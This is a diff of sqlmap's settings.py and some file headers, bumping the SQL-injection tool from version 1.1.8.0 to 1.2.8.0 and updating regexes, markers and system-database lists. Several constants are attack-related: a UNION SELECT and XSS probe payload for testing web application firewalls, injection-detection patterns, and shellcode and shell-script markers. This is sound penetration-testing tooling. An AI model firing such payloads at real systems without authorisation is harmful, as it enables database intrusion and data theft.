|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import os
|
import os
|
||||||
|
|||||||
@@ -1,8 +1,8 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import re
|
import re
|
||||||
|
|||||||
80
lib/core/settings.py
Executable file → Normal file
80
lib/core/settings.py
Executable file → Normal file
@@ -1,8 +1,8 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import os
|
import os
|
||||||
@@ -19,15 +19,17 @@ from lib.core.enums import DBMS_DIRECTORY_NAME
|
|||||||
from lib.core.enums import OS
|
from lib.core.enums import OS
|
||||||
|
|
||||||
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
|
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
|
||||||
VERSION = "1.1.8.0"
|
VERSION = "1.2.8.0"
|
||||||
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
|
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
|
||||||
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
|
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
|
||||||
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
|
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
|
||||||
DESCRIPTION = "automatic SQL injection and database takeover tool"
|
DESCRIPTION = "automatic SQL injection and database takeover tool"
|
||||||
SITE = "http://sqlmap.org"
|
SITE = "http://sqlmap.org"
|
||||||
|
DEV_EMAIL_ADDRESS = "dev@sqlmap.org"
|
||||||
ISSUES_PAGE = "https://github.com/sqlmapproject/sqlmap/issues/new"
|
ISSUES_PAGE = "https://github.com/sqlmapproject/sqlmap/issues/new"
|
||||||
GIT_REPOSITORY = "git://github.com/sqlmapproject/sqlmap.git"
|
GIT_REPOSITORY = "https://github.com/sqlmapproject/sqlmap.git"
|
||||||
GIT_PAGE = "https://github.com/sqlmapproject/sqlmap"
|
GIT_PAGE = "https://github.com/sqlmapproject/sqlmap"
|
||||||
|
ZIPBALL_PAGE = "https://github.com/sqlmapproject/sqlmap/zipball/master"
|
||||||
|
|
||||||
# colorful banner
|
# colorful banner
|
||||||
BANNER = """\033[01;33m\
|
BANNER = """\033[01;33m\
|
||||||
@@ -63,26 +65,31 @@ URI_QUESTION_MARKER = "__QUESTION_MARK__"
|
|||||||
ASTERISK_MARKER = "__ASTERISK_MARK__"
|
ASTERISK_MARKER = "__ASTERISK_MARK__"
|
||||||
REPLACEMENT_MARKER = "__REPLACEMENT_MARK__"
|
REPLACEMENT_MARKER = "__REPLACEMENT_MARK__"
|
||||||
BOUNDED_INJECTION_MARKER = "__BOUNDED_INJECTION_MARK__"
|
BOUNDED_INJECTION_MARKER = "__BOUNDED_INJECTION_MARK__"
|
||||||
|
SAFE_VARIABLE_MARKER = "__SAFE__"
|
||||||
|
|
||||||
RANDOM_INTEGER_MARKER = "[RANDINT]"
|
RANDOM_INTEGER_MARKER = "[RANDINT]"
|
||||||
RANDOM_STRING_MARKER = "[RANDSTR]"
|
RANDOM_STRING_MARKER = "[RANDSTR]"
|
||||||
SLEEP_TIME_MARKER = "[SLEEPTIME]"
|
SLEEP_TIME_MARKER = "[SLEEPTIME]"
|
||||||
|
INFERENCE_MARKER = "[INFERENCE]"
|
||||||
|
|
||||||
PAYLOAD_DELIMITER = "__PAYLOAD_DELIMITER__"
|
PAYLOAD_DELIMITER = "__PAYLOAD_DELIMITER__"
|
||||||
CHAR_INFERENCE_MARK = "%c"
|
CHAR_INFERENCE_MARK = "%c"
|
||||||
PRINTABLE_CHAR_REGEX = r"[^\x00-\x1f\x7f-\xff]"
|
PRINTABLE_CHAR_REGEX = r"[^\x00-\x1f\x7f-\xff]"
|
||||||
|
|
||||||
# Regular expression used for extraction of table names (useful for (e.g.) MsAccess)
|
# Regular expression used for extraction of table names (useful for (e.g.) MsAccess)
|
||||||
SELECT_FROM_TABLE_REGEX = r"\bSELECT .+? FROM (?P<result>([\w.]|`[^`<>]+`)+)"
|
SELECT_FROM_TABLE_REGEX = r"\bSELECT\b.+?\bFROM\s+(?P<result>([\w.]|`[^`<>]+`)+)"
|
||||||
|
|
||||||
# Regular expression used for recognition of textual content-type
|
# Regular expression used for recognition of textual content-type
|
||||||
TEXT_CONTENT_TYPE_REGEX = r"(?i)(text|form|message|xml|javascript|ecmascript|json)"
|
TEXT_CONTENT_TYPE_REGEX = r"(?i)(text|form|message|xml|javascript|ecmascript|json)"
|
||||||
|
|
||||||
# Regular expression used for recognition of generic permission messages
|
# Regular expression used for recognition of generic permission messages
|
||||||
PERMISSION_DENIED_REGEX = r"(command|permission|access)\s*(was|is)?\s*denied"
|
PERMISSION_DENIED_REGEX = r"(?P<result>(command|permission|access)\s*(was|is)?\s*denied)"
|
||||||
|
|
||||||
|
# Regular expression used in recognition of generic protection mechanisms
|
||||||
|
GENERIC_PROTECTION_REGEX = r"(?i)\b(rejected|blocked|protection|incident|denied|detected|dangerous|firewall)\b"
|
||||||
|
|
||||||
# Regular expression used for recognition of generic maximum connection messages
|
# Regular expression used for recognition of generic maximum connection messages
|
||||||
MAX_CONNECTIONS_REGEX = r"max.+connections"
|
MAX_CONNECTIONS_REGEX = r"\bmax.+?\bconnection"
|
||||||
|
|
||||||
# Maximum consecutive connection errors before asking the user if he wants to continue
|
# Maximum consecutive connection errors before asking the user if he wants to continue
|
||||||
MAX_CONSECUTIVE_CONNECTION_ERRORS = 15
|
MAX_CONSECUTIVE_CONNECTION_ERRORS = 15
|
||||||
@@ -99,8 +106,8 @@ GOOGLE_REGEX = r"webcache\.googleusercontent\.com/search\?q=cache:[^:]+:([^+]+)\
|
|||||||
# Regular expression used for extracting results from DuckDuckGo search
|
# Regular expression used for extracting results from DuckDuckGo search
|
||||||
DUCKDUCKGO_REGEX = r'"u":"([^"]+)'
|
DUCKDUCKGO_REGEX = r'"u":"([^"]+)'
|
||||||
|
|
||||||
# Regular expression used for extracting results from Disconnect Search
|
# Regular expression used for extracting results from Bing search
|
||||||
DISCONNECT_SEARCH_REGEX = r'<p class="url wrapword">([^<]+)</p>'
|
BING_REGEX = r'<h2><a href="([^"]+)" h='
|
||||||
|
|
||||||
# Dummy user agent for search (if default one returns different results)
|
# Dummy user agent for search (if default one returns different results)
|
||||||
DUMMY_SEARCH_USER_AGENT = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0"
|
DUMMY_SEARCH_USER_AGENT = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0"
|
||||||
@@ -175,6 +182,9 @@ INFERENCE_UNKNOWN_CHAR = '?'
|
|||||||
# Character used for operation "greater" in inference
|
# Character used for operation "greater" in inference
|
||||||
INFERENCE_GREATER_CHAR = ">"
|
INFERENCE_GREATER_CHAR = ">"
|
||||||
|
|
||||||
|
# Character used for operation "greater or equal" in inference
|
||||||
|
INFERENCE_GREATER_EQUALS_CHAR = ">="
|
||||||
|
|
||||||
# Character used for operation "equals" in inference
|
# Character used for operation "equals" in inference
|
||||||
INFERENCE_EQUALS_CHAR = "="
|
INFERENCE_EQUALS_CHAR = "="
|
||||||
|
|
||||||
@@ -187,8 +197,8 @@ UNKNOWN_DBMS = "Unknown"
|
|||||||
# String used for representation of unknown DBMS version
|
# String used for representation of unknown DBMS version
|
||||||
UNKNOWN_DBMS_VERSION = "Unknown"
|
UNKNOWN_DBMS_VERSION = "Unknown"
|
||||||
|
|
||||||
# Dynamicity mark length used in dynamicity removal engine
|
# Dynamicity boundary length used in dynamicity removal engine
|
||||||
DYNAMICITY_MARK_LENGTH = 32
|
DYNAMICITY_BOUNDARY_LENGTH = 20
|
||||||
|
|
||||||
# Dummy user prefix used in dictionary attack
|
# Dummy user prefix used in dictionary attack
|
||||||
DUMMY_USER_PREFIX = "__dummy__"
|
DUMMY_USER_PREFIX = "__dummy__"
|
||||||
@@ -196,6 +206,11 @@ DUMMY_USER_PREFIX = "__dummy__"
|
|||||||
# Reference: http://en.wikipedia.org/wiki/ISO/IEC_8859-1
|
# Reference: http://en.wikipedia.org/wiki/ISO/IEC_8859-1
|
||||||
DEFAULT_PAGE_ENCODING = "iso-8859-1"
|
DEFAULT_PAGE_ENCODING = "iso-8859-1"
|
||||||
|
|
||||||
|
try:
|
||||||
|
unicode(DEFAULT_PAGE_ENCODING, DEFAULT_PAGE_ENCODING)
|
||||||
|
except LookupError:
|
||||||
|
DEFAULT_PAGE_ENCODING = "utf8"
|
||||||
|
|
||||||
# URL used in dummy runs
|
# URL used in dummy runs
|
||||||
DUMMY_URL = "http://foo/bar?id=1"
|
DUMMY_URL = "http://foo/bar?id=1"
|
||||||
|
|
||||||
@@ -210,7 +225,7 @@ PYVERSION = sys.version.split()[0]
|
|||||||
MSSQL_SYSTEM_DBS = ("Northwind", "master", "model", "msdb", "pubs", "tempdb")
|
MSSQL_SYSTEM_DBS = ("Northwind", "master", "model", "msdb", "pubs", "tempdb")
|
||||||
MYSQL_SYSTEM_DBS = ("information_schema", "mysql", "performance_schema")
|
MYSQL_SYSTEM_DBS = ("information_schema", "mysql", "performance_schema")
|
||||||
PGSQL_SYSTEM_DBS = ("information_schema", "pg_catalog", "pg_toast", "pgagent")
|
PGSQL_SYSTEM_DBS = ("information_schema", "pg_catalog", "pg_toast", "pgagent")
|
||||||
ORACLE_SYSTEM_DBS = ("ANONYMOUS", "APEX_PUBLIC_USER", "CTXSYS", "DBSNMP", "DIP", "EXFSYS", "FLOWS_%", "FLOWS_FILES", "LBACSYS", "MDDATA", "MDSYS", "MGMT_VIEW", "OLAPSYS", "ORACLE_OCM", "ORDDATA", "ORDPLUGINS", "ORDSYS", "OUTLN", "OWBSYS", "SI_INFORMTN_SCHEMA", "SPATIAL_CSW_ADMIN_USR", "SPATIAL_WFS_ADMIN_USR", "SYS", "SYSMAN", "SYSTEM", "WKPROXY", "WKSYS", "WK_TEST", "WMSYS", "XDB", "XS$NULL") # Reference: https://blog.vishalgupta.com/2011/06/19/predefined-oracle-system-schemas/
|
ORACLE_SYSTEM_DBS = ('ANONYMOUS', 'APEX_030200', 'APEX_PUBLIC_USER', 'APPQOSSYS', 'BI', 'CTXSYS', 'DBSNMP', 'DIP', 'EXFSYS', 'FLOWS_%', 'FLOWS_FILES', 'HR', 'IX', 'LBACSYS', 'MDDATA', 'MDSYS', 'MGMT_VIEW', 'OC', 'OE', 'OLAPSYS', 'ORACLE_OCM', 'ORDDATA', 'ORDPLUGINS', 'ORDSYS', 'OUTLN', 'OWBSYS', 'PM', 'SCOTT', 'SH', 'SI_INFORMTN_SCHEMA', 'SPATIAL_CSW_ADMIN_USR', 'SPATIAL_WFS_ADMIN_USR', 'SYS', 'SYSMAN', 'SYSTEM', 'WKPROXY', 'WKSYS', 'WK_TEST', 'WMSYS', 'XDB', 'XS$NULL')
|
||||||
SQLITE_SYSTEM_DBS = ("sqlite_master", "sqlite_temp_master")
|
SQLITE_SYSTEM_DBS = ("sqlite_master", "sqlite_temp_master")
|
||||||
ACCESS_SYSTEM_DBS = ("MSysAccessObjects", "MSysACEs", "MSysObjects", "MSysQueries", "MSysRelationships", "MSysAccessStorage", "MSysAccessXML", "MSysModules", "MSysModules2")
|
ACCESS_SYSTEM_DBS = ("MSysAccessObjects", "MSysACEs", "MSysObjects", "MSysQueries", "MSysRelationships", "MSysAccessStorage", "MSysAccessXML", "MSysModules", "MSysModules2")
|
||||||
FIREBIRD_SYSTEM_DBS = ("RDB$BACKUP_HISTORY", "RDB$CHARACTER_SETS", "RDB$CHECK_CONSTRAINTS", "RDB$COLLATIONS", "RDB$DATABASE", "RDB$DEPENDENCIES", "RDB$EXCEPTIONS", "RDB$FIELDS", "RDB$FIELD_DIMENSIONS", " RDB$FILES", "RDB$FILTERS", "RDB$FORMATS", "RDB$FUNCTIONS", "RDB$FUNCTION_ARGUMENTS", "RDB$GENERATORS", "RDB$INDEX_SEGMENTS", "RDB$INDICES", "RDB$LOG_FILES", "RDB$PAGES", "RDB$PROCEDURES", "RDB$PROCEDURE_PARAMETERS", "RDB$REF_CONSTRAINTS", "RDB$RELATIONS", "RDB$RELATION_CONSTRAINTS", "RDB$RELATION_FIELDS", "RDB$ROLES", "RDB$SECURITY_CLASSES", "RDB$TRANSACTIONS", "RDB$TRIGGERS", "RDB$TRIGGER_MESSAGES", "RDB$TYPES", "RDB$USER_PRIVILEGES", "RDB$VIEW_RELATIONS")
|
FIREBIRD_SYSTEM_DBS = ("RDB$BACKUP_HISTORY", "RDB$CHARACTER_SETS", "RDB$CHECK_CONSTRAINTS", "RDB$COLLATIONS", "RDB$DATABASE", "RDB$DEPENDENCIES", "RDB$EXCEPTIONS", "RDB$FIELDS", "RDB$FIELD_DIMENSIONS", " RDB$FILES", "RDB$FILTERS", "RDB$FORMATS", "RDB$FUNCTIONS", "RDB$FUNCTION_ARGUMENTS", "RDB$GENERATORS", "RDB$INDEX_SEGMENTS", "RDB$INDICES", "RDB$LOG_FILES", "RDB$PAGES", "RDB$PROCEDURES", "RDB$PROCEDURE_PARAMETERS", "RDB$REF_CONSTRAINTS", "RDB$RELATIONS", "RDB$RELATION_CONSTRAINTS", "RDB$RELATION_FIELDS", "RDB$ROLES", "RDB$SECURITY_CLASSES", "RDB$TRANSACTIONS", "RDB$TRIGGERS", "RDB$TRIGGER_MESSAGES", "RDB$TYPES", "RDB$USER_PRIVILEGES", "RDB$VIEW_RELATIONS")
|
||||||
@@ -285,6 +300,10 @@ BASIC_HELP_ITEMS = (
|
|||||||
"wizard",
|
"wizard",
|
||||||
)
|
)
|
||||||
|
|
||||||
|
# Tags used for value replacements inside shell scripts
|
||||||
|
SHELL_WRITABLE_DIR_TAG = "%WRITABLE_DIR%"
|
||||||
|
SHELL_RUNCMD_EXE_TAG = "%RUNCMD_EXE%"
|
||||||
|
|
||||||
# String representation for NULL value
|
# String representation for NULL value
|
||||||
NULL = "NULL"
|
NULL = "NULL"
|
||||||
|
|
||||||
@@ -294,13 +313,16 @@ BLANK = "<blank>"
|
|||||||
# String representation for current database
|
# String representation for current database
|
||||||
CURRENT_DB = "CD"
|
CURRENT_DB = "CD"
|
||||||
|
|
||||||
|
# Name of SQLite file used for storing session data
|
||||||
|
SESSION_SQLITE_FILE = "session.sqlite"
|
||||||
|
|
||||||
# Regular expressions used for finding file paths in error messages
|
# Regular expressions used for finding file paths in error messages
|
||||||
FILE_PATH_REGEXES = (r"<b>(?P<result>[^<>]+?)</b> on line \d+", r"(?P<result>[^<>'\"]+?)['\"]? on line \d+", r"(?:[>(\[\s])(?P<result>[A-Za-z]:[\\/][\w. \\/-]*)", r"(?:[>(\[\s])(?P<result>/\w[/\w.-]+)", r"href=['\"]file://(?P<result>/[^'\"]+)")
|
FILE_PATH_REGEXES = (r"<b>(?P<result>[^<>]+?)</b> on line \d+", r"in (?P<result>[^<>'\"]+?)['\"]? on line \d+", r"(?:[>(\[\s])(?P<result>[A-Za-z]:[\\/][\w. \\/-]*)", r"(?:[>(\[\s])(?P<result>/\w[/\w.~-]+)", r"href=['\"]file://(?P<result>/[^'\"]+)")
|
||||||
|
|
||||||
# Regular expressions used for parsing error messages (--parse-errors)
|
# Regular expressions used for parsing error messages (--parse-errors)
|
||||||
ERROR_PARSING_REGEXES = (
|
ERROR_PARSING_REGEXES = (
|
||||||
r"<b>[^<]*(fatal|error|warning|exception)[^<]*</b>:?\s*(?P<result>.+?)<br\s*/?\s*>",
|
r"<b>[^<]*(fatal|error|warning|exception)[^<]*</b>:?\s*(?P<result>.+?)<br\s*/?\s*>",
|
||||||
r"(?m)^(fatal|error|warning|exception):?\s*(?P<result>[^\n]+?)$",
|
r"(?m)^\s*(fatal|error|warning|exception):?\s*(?P<result>[^\n]+?)$",
|
||||||
r"(?P<result>[^\n>]*SQL Syntax[^\n<]+)",
|
r"(?P<result>[^\n>]*SQL Syntax[^\n<]+)",
|
||||||
r"<li>Error Type:<br>(?P<result>.+?)</li>",
|
r"<li>Error Type:<br>(?P<result>.+?)</li>",
|
||||||
r"CDbCommand (?P<result>[^<>\n]*SQL[^<>\n]+)",
|
r"CDbCommand (?P<result>[^<>\n]*SQL[^<>\n]+)",
|
||||||
@@ -342,10 +364,10 @@ URI_HTTP_HEADER = "URI"
|
|||||||
URI_INJECTABLE_REGEX = r"//[^/]*/([^\.*?]+)\Z"
|
URI_INJECTABLE_REGEX = r"//[^/]*/([^\.*?]+)\Z"
|
||||||
|
|
||||||
# Regex used for masking sensitive data
|
# Regex used for masking sensitive data
|
||||||
SENSITIVE_DATA_REGEX = "(\s|=)(?P<result>[^\s=]*%s[^\s]*)\s"
|
SENSITIVE_DATA_REGEX = r"(\s|=)(?P<result>[^\s=]*%s[^\s]*)\s"
|
||||||
|
|
||||||
# Options to explicitly mask in anonymous (unhandled exception) reports (along with anything carrying the <hostname> inside)
|
# Options to explicitly mask in anonymous (unhandled exception) reports (along with anything carrying the <hostname> inside)
|
||||||
SENSITIVE_OPTIONS = ("hostname", "data", "dnsDomain", "googleDork", "authCred", "proxyCred", "tbl", "db", "col", "user", "cookie", "proxy", "rFile", "wFile", "dFile", "testParameter", "authCred")
|
SENSITIVE_OPTIONS = ("hostname", "answers", "data", "dnsDomain", "googleDork", "authCred", "proxyCred", "tbl", "db", "col", "user", "cookie", "proxy", "rFile", "wFile", "dFile", "testParameter", "authCred")
|
||||||
|
|
||||||
# Maximum number of threads (avoiding connection issues and/or DoS)
|
# Maximum number of threads (avoiding connection issues and/or DoS)
|
||||||
MAX_NUMBER_OF_THREADS = 10
|
MAX_NUMBER_OF_THREADS = 10
|
||||||
@@ -366,7 +388,7 @@ CANDIDATE_SENTENCE_MIN_LENGTH = 10
|
|||||||
CUSTOM_INJECTION_MARK_CHAR = '*'
|
CUSTOM_INJECTION_MARK_CHAR = '*'
|
||||||
|
|
||||||
# Other way to declare injection position
|
# Other way to declare injection position
|
||||||
INJECT_HERE_REGEX = '(?i)%INJECT[_ ]?HERE%'
|
INJECT_HERE_REGEX = r"(?i)%INJECT[_ ]?HERE%"
|
||||||
|
|
||||||
# Minimum chunk length used for retrieving data over error based payloads
|
# Minimum chunk length used for retrieving data over error based payloads
|
||||||
MIN_ERROR_CHUNK_LENGTH = 8
|
MIN_ERROR_CHUNK_LENGTH = 8
|
||||||
@@ -407,6 +429,9 @@ HASH_MOD_ITEM_DISPLAY = 11
|
|||||||
# Maximum integer value
|
# Maximum integer value
|
||||||
MAX_INT = sys.maxint
|
MAX_INT = sys.maxint
|
||||||
|
|
||||||
|
# Replacement for unsafe characters in dump table filenames
|
||||||
|
UNSAFE_DUMP_FILEPATH_REPLACEMENT = '_'
|
||||||
|
|
||||||
# Options that need to be restored in multiple targets run mode
|
# Options that need to be restored in multiple targets run mode
|
||||||
RESTORE_MERGED_OPTIONS = ("col", "db", "dnsDomain", "privEsc", "tbl", "regexp", "string", "textOnly", "threads", "timeSec", "tmpPath", "uChar", "user")
|
RESTORE_MERGED_OPTIONS = ("col", "db", "dnsDomain", "privEsc", "tbl", "regexp", "string", "textOnly", "threads", "timeSec", "tmpPath", "uChar", "user")
|
||||||
|
|
||||||
@@ -462,7 +487,7 @@ LEGAL_DISCLAIMER = "Usage of sqlmap for attacking targets without prior mutual c
|
|||||||
REFLECTIVE_MISS_THRESHOLD = 20
|
REFLECTIVE_MISS_THRESHOLD = 20
|
||||||
|
|
||||||
# Regular expression used for extracting HTML title
|
# Regular expression used for extracting HTML title
|
||||||
HTML_TITLE_REGEX = "<title>(?P<result>[^<]+)</title>"
|
HTML_TITLE_REGEX = r"<title>(?P<result>[^<]+)</title>"
|
||||||
|
|
||||||
# Table used for Base64 conversion in WordPress hash cracking routine
|
# Table used for Base64 conversion in WordPress hash cracking routine
|
||||||
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
|
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
|
||||||
@@ -473,7 +498,7 @@ PICKLE_REDUCE_WHITELIST = (types.BooleanType, types.DictType, types.FloatType, t
|
|||||||
DUMMY_SQL_INJECTION_CHARS = ";()'"
|
DUMMY_SQL_INJECTION_CHARS = ";()'"
|
||||||
|
|
||||||
# Simple check against dummy users
|
# Simple check against dummy users
|
||||||
DUMMY_USER_INJECTION = r"(?i)[^\w](AND|OR)\s+[^\s]+[=><]|\bUNION\b.+\bSELECT\b|\bSELECT\b.+\bFROM\b|\b(CONCAT|information_schema|SLEEP|DELAY)\b"
|
DUMMY_USER_INJECTION = r"(?i)[^\w](AND|OR)\s+[^\s]+[=><]|\bUNION\b.+\bSELECT\b|\bSELECT\b.+\bFROM\b|\b(CONCAT|information_schema|SLEEP|DELAY|FLOOR\(RAND)\b"
|
||||||
|
|
||||||
# Extensions skipped by crawler
|
# Extensions skipped by crawler
|
||||||
CRAWL_EXCLUDE_EXTENSIONS = ("3ds", "3g2", "3gp", "7z", "DS_Store", "a", "aac", "adp", "ai", "aif", "aiff", "apk", "ar", "asf", "au", "avi", "bak", "bin", "bk", "bmp", "btif", "bz2", "cab", "caf", "cgm", "cmx", "cpio", "cr2", "dat", "deb", "djvu", "dll", "dmg", "dmp", "dng", "doc", "docx", "dot", "dotx", "dra", "dsk", "dts", "dtshd", "dvb", "dwg", "dxf", "ear", "ecelp4800", "ecelp7470", "ecelp9600", "egg", "eol", "eot", "epub", "exe", "f4v", "fbs", "fh", "fla", "flac", "fli", "flv", "fpx", "fst", "fvt", "g3", "gif", "gz", "h261", "h263", "h264", "ico", "ief", "image", "img", "ipa", "iso", "jar", "jpeg", "jpg", "jpgv", "jpm", "jxr", "ktx", "lvp", "lz", "lzma", "lzo", "m3u", "m4a", "m4v", "mar", "mdi", "mid", "mj2", "mka", "mkv", "mmr", "mng", "mov", "movie", "mp3", "mp4", "mp4a", "mpeg", "mpg", "mpga", "mxu", "nef", "npx", "o", "oga", "ogg", "ogv", "otf", "pbm", "pcx", "pdf", "pea", "pgm", "pic", "png", "pnm", "ppm", "pps", "ppt", "pptx", "ps", "psd", "pya", "pyc", "pyo", "pyv", "qt", "rar", "ras", "raw", "rgb", "rip", "rlc", "rz", "s3m", "s7z", "scm", "scpt", "sgi", "shar", "sil", "smv", "so", "sub", "swf", "tar", "tbz2", "tga", "tgz", "tif", "tiff", "tlz", "ts", "ttf", "uvh", "uvi", "uvm", "uvp", "uvs", "uvu", "viv", "vob", "war", "wav", "wax", "wbmp", "wdp", "weba", "webm", "webp", "whl", "wm", "wma", "wmv", "wmx", "woff", "woff2", "wvx", "xbm", "xif", "xls", "xlsx", "xlt", "xm", "xpi", "xpm", "xwd", "xz", "z", "zip", "zipx")
|
CRAWL_EXCLUDE_EXTENSIONS = ("3ds", "3g2", "3gp", "7z", "DS_Store", "a", "aac", "adp", "ai", "aif", "aiff", "apk", "ar", "asf", "au", "avi", "bak", "bin", "bk", "bmp", "btif", "bz2", "cab", "caf", "cgm", "cmx", "cpio", "cr2", "dat", "deb", "djvu", "dll", "dmg", "dmp", "dng", "doc", "docx", "dot", "dotx", "dra", "dsk", "dts", "dtshd", "dvb", "dwg", "dxf", "ear", "ecelp4800", "ecelp7470", "ecelp9600", "egg", "eol", "eot", "epub", "exe", "f4v", "fbs", "fh", "fla", "flac", "fli", "flv", "fpx", "fst", "fvt", "g3", "gif", "gz", "h261", "h263", "h264", "ico", "ief", "image", "img", "ipa", "iso", "jar", "jpeg", "jpg", "jpgv", "jpm", "jxr", "ktx", "lvp", "lz", "lzma", "lzo", "m3u", "m4a", "m4v", "mar", "mdi", "mid", "mj2", "mka", "mkv", "mmr", "mng", "mov", "movie", "mp3", "mp4", "mp4a", "mpeg", "mpg", "mpga", "mxu", "nef", "npx", "o", "oga", "ogg", "ogv", "otf", "pbm", "pcx", "pdf", "pea", "pgm", "pic", "png", "pnm", "ppm", "pps", "ppt", "pptx", "ps", "psd", "pya", "pyc", "pyo", "pyv", "qt", "rar", "ras", "raw", "rgb", "rip", "rlc", "rz", "s3m", "s7z", "scm", "scpt", "sgi", "shar", "sil", "smv", "so", "sub", "swf", "tar", "tbz2", "tga", "tgz", "tif", "tiff", "tlz", "ts", "ttf", "uvh", "uvi", "uvm", "uvp", "uvs", "uvu", "viv", "vob", "war", "wav", "wax", "wbmp", "wdp", "weba", "webm", "webp", "whl", "wm", "wma", "wmv", "wmx", "woff", "woff2", "wvx", "xbm", "xif", "xls", "xlsx", "xlt", "xm", "xpi", "xpm", "xwd", "xz", "z", "zip", "zipx")
|
||||||
@@ -494,7 +519,7 @@ IDS_WAF_CHECK_PAYLOAD = "AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert(\"XSS\")
|
|||||||
SHELLCODEEXEC_RANDOM_STRING_MARKER = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
|
SHELLCODEEXEC_RANDOM_STRING_MARKER = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
|
||||||
|
|
||||||
# Generic address for checking the Internet connection while using switch --check-internet
|
# Generic address for checking the Internet connection while using switch --check-internet
|
||||||
CHECK_INTERNET_ADDRESS = "http://ipinfo.io/"
|
CHECK_INTERNET_ADDRESS = "https://ipinfo.io/"
|
||||||
|
|
||||||
# Value to look for in response to CHECK_INTERNET_ADDRESS
|
# Value to look for in response to CHECK_INTERNET_ADDRESS
|
||||||
CHECK_INTERNET_VALUE = "IP Address Details"
|
CHECK_INTERNET_VALUE = "IP Address Details"
|
||||||
@@ -514,6 +539,9 @@ ROTATING_CHARS = ('\\', '|', '|', '/', '-')
|
|||||||
# Approximate chunk length (in bytes) used by BigArray objects (only last chunk and cached one are held in memory)
|
# Approximate chunk length (in bytes) used by BigArray objects (only last chunk and cached one are held in memory)
|
||||||
BIGARRAY_CHUNK_SIZE = 1024 * 1024
|
BIGARRAY_CHUNK_SIZE = 1024 * 1024
|
||||||
|
|
||||||
|
# Compress level used for storing BigArray chunks to disk (0-9)
|
||||||
|
BIGARRAY_COMPRESS_LEVEL = 9
|
||||||
|
|
||||||
# Maximum number of socket pre-connects
|
# Maximum number of socket pre-connects
|
||||||
SOCKET_PRE_CONNECT_QUEUE_SIZE = 3
|
SOCKET_PRE_CONNECT_QUEUE_SIZE = 3
|
||||||
|
|
||||||
@@ -570,7 +598,7 @@ HASHDB_RETRIEVE_RETRIES = 3
|
|||||||
HASHDB_END_TRANSACTION_RETRIES = 3
|
HASHDB_END_TRANSACTION_RETRIES = 3
|
||||||
|
|
||||||
# Unique milestone value used for forced deprecation of old HashDB values (e.g. when changing hash/pickle mechanism)
|
# Unique milestone value used for forced deprecation of old HashDB values (e.g. when changing hash/pickle mechanism)
|
||||||
HASHDB_MILESTONE_VALUE = "dPHoJRQYvs" # python -c 'import random, string; print "".join(random.sample(string.ascii_letters, 10))'
|
HASHDB_MILESTONE_VALUE = "BZzRotigLX" # python -c 'import random, string; print "".join(random.sample(string.ascii_letters, 10))'
|
||||||
|
|
||||||
# Warn user of possible delay due to large page dump in full UNION query injections
|
# Warn user of possible delay due to large page dump in full UNION query injections
|
||||||
LARGE_OUTPUT_THRESHOLD = 1024 ** 2
|
LARGE_OUTPUT_THRESHOLD = 1024 ** 2
|
||||||
@@ -591,7 +619,7 @@ MAX_TOTAL_REDIRECTIONS = 10
|
|||||||
MAX_DNS_LABEL = 63
|
MAX_DNS_LABEL = 63
|
||||||
|
|
||||||
# Alphabet used for prefix and suffix strings of name resolution requests in DNS technique (excluding hexadecimal chars for not mixing with inner content)
|
# Alphabet used for prefix and suffix strings of name resolution requests in DNS technique (excluding hexadecimal chars for not mixing with inner content)
|
||||||
DNS_BOUNDARIES_ALPHABET = re.sub("[a-fA-F]", "", string.ascii_letters)
|
DNS_BOUNDARIES_ALPHABET = re.sub(r"[a-fA-F]", "", string.ascii_letters)
|
||||||
|
|
||||||
# Alphabet used for heuristic checks
|
# Alphabet used for heuristic checks
|
||||||
HEURISTIC_CHECK_ALPHABET = ('"', '\'', ')', '(', ',', '.')
|
HEURISTIC_CHECK_ALPHABET = ('"', '\'', ')', '(', ',', '.')
|
||||||
@@ -603,7 +631,7 @@ BANNER = re.sub(r"\[.\]", lambda _: "[\033[01;41m%s\033[01;49m]" % random.sample
|
|||||||
